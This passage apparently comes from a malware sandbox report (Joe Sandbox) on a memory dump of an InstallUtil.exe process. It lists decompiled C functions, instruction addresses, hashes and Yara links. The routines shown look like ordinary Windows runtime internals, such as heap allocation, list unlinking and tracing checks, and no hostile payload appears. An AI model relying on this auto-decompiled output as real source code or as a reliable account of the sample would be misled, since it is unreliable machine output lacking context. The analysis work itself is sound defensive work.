				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0130F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E012FA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x013090af
0x013090b8
0x013090bb
0x013090bf
0x013090c2
0x013090c2
0x013090c8
0x013090cb
0x013090cd
0x013414d7
0x013414eb
0x013414eb
0x00000000
0x013414eb
0x013414db
0x013414e6
0x00000000
0x013414f2
0x013414e8
0x00000000
0x013414e8
0x013090d8
0x013090da
0x013090dd
0x013090e5
0x00000000
0x01309139
0x013090fa
0x013090fe
0x01309142
0x00000000
0x01309142
0x01309104
0x01309107
0x0130910b
0x01309110
0x01309118
0x01309147
0x01309148
0x0130914f
0x01309150
0x01309151
0x01309152
0x01309156
0x0130915d
0x01309160
0x01309168
0x0130916c
0x013091bc
0x013091be
0x00000000
0x013091be
0x0130916e
0x01309173
0x01309176
0x00000000
0x00000000
0x0130917c
0x01309180
0x013091b5
0x00000000
0x013091b5
0x01309182
0x01309185
0x01309189
0x00000000
0x00000000
0x0130918e
0x01309190
0x01309198
0x00000000
0x00000000
0x013091a0
0x00000000
0x013091ad
0x013091ad
0x013091b0
0x013091b1
0x00000000
0x01309185
0x0130911a
0x0130911c
0x0130911f
0x01309125
0x01309127
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: e440a65db7a8fa1039357c4cd6da4f021b9b92440be314bf4a237779e7a97fad
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 11218371A00209EFDB22DF59C444B6AFBF8EB58318F15846AE949A7651D370ED40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012F3B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E012F3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x13b84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x13b84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x13b84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0130AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0130FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x13b84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x13b84c4; // 0x0
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x012f3b89
0x012f3b96
0x012f3ba1
0x012f3bab
0x012f3bb5
0x012f3bb9
0x01336298
0x012f3bbf
0x012f3bc2
0x012f3bc3
0x012f3bc9
0x012f3bca
0x012f3bcc
0x012f3bcd
0x012f3bd4
0x012f3bd6
0x012f3bdb
0x012f3bea
0x012f3bf7
0x012f3bfb
0x012f3bff
0x012f3c09
0x012f3c0a
0x012f3c0b
0x012f3c0f
0x012f3c14
0x012f3c18
0x012f3c18
0x012f3bfb
0x012f3c1b
0x012f3c30
0x012f3c30
0x012f3c3d

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f10b8e6e6540bbf66f4cb80c471278e6284a556c2c8b7fde764904c7b54e5c9a
Instruction ID: 29df72236bd0b3a48dae5c1f998df575d2b68a4f89f2a7192af3cb4519c82397
Opcode Fuzzy Hash: f10b8e6e6540bbf66f4cb80c471278e6284a556c2c8b7fde764904c7b54e5c9a
Instruction Fuzzy Hash: EE219F72A00109AFD715DF98DD81B6ABBBDFB44708F1500A8EA08EB251D375ED51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01346CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01346CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E012E7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E012E7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x12a5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E012FF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E012FF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01347016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L012E2400( &_v52);
								}
								_t21 = L012E2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x01346cfb
0x01346d00
0x01346d02
0x01346d06
0x01346d0a
0x01346d0e
0x01346d19
0x01346d2b
0x01346d1b
0x01346d24
0x01346d24
0x01346d33
0x01346d39
0x01346d46
0x01346d4f
0x01346d61
0x01346d51
0x01346d5a
0x01346d5a
0x01346d69
0x01346d6b
0x01346d6d
0x01346d6f
0x01346d6f
0x01346d74
0x01346d79
0x01346d7a
0x01346d7f
0x01346d82
0x01346d88
0x01346d89
0x01346d90
0x01346d94
0x01346da7
0x01346db1
0x01346db1
0x01346dbb
0x01346dbb
0x01346d90
0x01346d69
0x01346d46
0x01346dc6

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 866612f61212de37f5d8936fe905fcb0a8d3aaa4281a749733f3477889ffec3b
Instruction ID: 7ca58c30673c7438d00056b2796c78fba5d0c9d391681d6326c449f311404aa6
Opcode Fuzzy Hash: 866612f61212de37f5d8936fe905fcb0a8d3aaa4281a749733f3477889ffec3b
Instruction Fuzzy Hash: B721C5B25043459FD711EF29C945F67BBECEF93644F040566FA80C7261EB34E948C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0139070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0139070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E013907DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0138AFDE( &_v8,  &_v12);
					E01391293(_t38, _v28, _t60);
					if(E012E7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E013814FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0139071b
0x01390724
0x01390734
0x01390738
0x0139074b
0x0139074b
0x01390753
0x01390753
0x01390759
0x0139075d
0x01390774
0x01390779
0x0139077d
0x01390789
0x01390795
0x013907a7
0x01390797
0x013907a0
0x013907a0
0x013907af
0x013907c4
0x013907cd
0x013907cd
0x013907af
0x013907dc

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: fe36bb020c3b7c912cfb2caa94faa974ba1704a7f9f0a26a4487a8a3c6ede34c
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 4A210436204204AFDB09DF1CC884B6ABBA9EFD4364F048569F9959B381D730D909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01347794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01347794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x13b7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0130F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E012E7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01309AE0();
					_t24 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x01347799
0x0134779a
0x0134779b
0x013477a3
0x013477ab
0x013477ae
0x013477b1
0x013477b1
0x013477bf
0x013477c4
0x013477c8
0x013477ce
0x013477d4
0x013477e0
0x013477e0
0x013477d6
0x013477d6
0x013477de
0x00000000
0x00000000
0x013477de
0x013477e5
0x013477f0
0x013477f3
0x013477f6
0x013477fd
0x01347800
0x0134780c
0x01347818
0x0134782b
0x0134781a
0x01347823
0x01347823
0x01347830
0x01347831
0x01347838
0x0134783d
0x0134783e
0x0134784f
0x0134784f
0x0134785a

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed2c3afc682b26669964d126f792448c20bf27661dc3b1cdc8eba2e323f79ab
Instruction ID: 2ebcb05cf37b89a4ee739979c763c2d4b1e651db71613c2bd3548d7d7ea3dcac
Opcode Fuzzy Hash: 8ed2c3afc682b26669964d126f792448c20bf27661dc3b1cdc8eba2e323f79ab
Instruction Fuzzy Hash: 0C219D72900604AFD725DF69D894E6BBBE8EF88344F100569EA0AD7690E734E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 012EAE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E012EAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E012E7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E012E7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E012E7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E012E7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01347794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x012eae78
0x012eae7c
0x012eae7e
0x012eae81
0x012eae86
0x012eae8d
0x01332691
0x012eae93
0x012eae93
0x012eae93
0x012eae98
0x012eae9d
0x013326a2
0x013326b4
0x013326a4
0x013326ad
0x013326ad
0x013326b9
0x00000000
0x013326bb
0x00000000
0x013326bb
0x012eaea3
0x012eaea3
0x012eaea3
0x012eaeaa
0x013326c0
0x013326c9
0x013326c9
0x012eaeb3
0x013326d4
0x013326e1
0x00000000
0x00000000
0x013326e7
0x013326ee
0x013326f0
0x013326f9
0x013326f9
0x01332702
0x01332708
0x01332708
0x0133270b
0x0133270f
0x01332711
0x01332711
0x01332725
0x01332725
0x00000000
0x012eaeb9
0x012eaeb9
0x012eaebf
0x012eaebf
0x012eaeb3

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 4efd6540477eda12d9dc1cbeebc64eef23e4f5a38766236bd32638b83726a2de
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 0621D472611685DFEB269B2DC948B367BE8EF84254F0900A0ED048B692D7B5DC40C694

Uniqueness

Uniqueness Score: -1.00%

Function 012FFD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E012FFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E012D76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x012ffd9b
0x012ffda0
0x012ffda1
0x012ffdab
0x012ffdad
0x012ffdb0
0x012ffdb8
0x012ffe0f
0x012ffde6
0x012ffde9
0x012ffdec
0x0133c0c0
0x012ffdfe
0x012ffe06
0x012ffe06
0x0133c0c8
0x012ffe2d
0x012ffe2d
0x00000000
0x012ffe2d
0x0133c0d1
0x0133c0e0
0x0133c0e5
0x0133c0e5
0x0133c0e8
0x00000000
0x0133c0e8
0x012ffdf4
0x00000000
0x00000000
0x012ffdf6
0x012ffdfa
0x012ffe1a
0x012ffe1f
0x012ffe1f
0x012ffdfc
0x00000000
0x012ffdfc
0x012ffdcc
0x012ffdd0
0x012ffe26
0x00000000
0x012ffe26
0x012ffdd8
0x012ffddb
0x012ffddd
0x012ffde0
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 2d107c7fea3a3bb095422b56f0e965005aabb6976b58e9669497ee916875d17d
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: A1217972A60A41DFD735CF0EC640A66F7E5EB94A10F25817EEA5987A51E730EC00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012FB390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E012FB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E012E2280(_t12, 0x13b8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E013000C2(0x13b8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x012fb395
0x012fb3a2
0x012fb3a5
0x012fb3aa
0x012fb3b2
0x012fb3ba
0x012fb3bd
0x012fb3c0
0x012fb3c4
0x012fb3c9
0x0133a3e9
0x0133a3ed
0x0133a3f0
0x0133a3ff
0x0133a403
0x0133a409
0x00000000
0x00000000
0x0133a40b
0x0133a40b
0x0133a40f
0x0133a415
0x0133a423
0x0133a423
0x0133a415
0x012fb3d1
0x012fb3e8
0x012fb3e8
0x012fb3d9

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2592307cfb15459525be716afea3020cbc64c5768dc3064454d8dc79f948a1ea
Instruction ID: 4df0845b746e33f12653e8de50383dcf2af69c2b8935c66115c0576b3b8c8f1c
Opcode Fuzzy Hash: 2592307cfb15459525be716afea3020cbc64c5768dc3064454d8dc79f948a1ea
Instruction Fuzzy Hash: 951148373611109BCB19CB19CD81A6BB29AEBC5334F24013DEF16C7790DA719C02C794

Uniqueness

Uniqueness Score: -1.00%

Function 012C9240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E012C9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x139f708);
				E0131D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E013095D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E013095D0();
				_t33 =  *0x13b84c4; // 0x0
				L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x13b84c4; // 0x0
				L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x13b84c4; // 0x0
				E012E2280(L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x13b86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E013095D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E013095D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E012C9325();
					_t50 =  *0x13b84c4; // 0x0
					return E0131D0D1(L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x012c9240
0x012c9242
0x012c9247
0x012c924c
0x012c924e
0x012c9255
0x012c9257
0x012c925a
0x012c925f
0x012c925f
0x012c9266
0x012c9271
0x012c9276
0x012c9279
0x012c927e
0x012c9295
0x012c929a
0x012c92b1
0x012c92b6
0x012c92d7
0x012c92dc
0x012c92e0
0x012c92e6
0x012c92e8
0x012c92ee
0x012c9332
0x012c9333
0x012c9337
0x012c9338
0x012c933a
0x012c933a
0x012c933d
0x012c9342
0x012c9342
0x012c9345
0x012c9349
0x012c934e
0x012c9352
0x012c9357
0x012c92f4
0x012c92f4
0x012c92f6
0x012c92f9
0x012c9300
0x012c9306
0x012c9324
0x012c9324

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 39c333d3fc1c38a32b4b2afeb530f84e4bfc374aa5069b0f058b702ad4c76386
Instruction ID: 9ceb267f86d8926aa117d811b42a909ff167baa9aeb8de6f945f338276c6eb2f
Opcode Fuzzy Hash: 39c333d3fc1c38a32b4b2afeb530f84e4bfc374aa5069b0f058b702ad4c76386
Instruction Fuzzy Hash: 57216D31051A02DFC726EF68CA44F29B7F9FF18708F0446ACE249976A2D734E941CB44

Uniqueness

Uniqueness Score: -1.00%

Function 01354257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

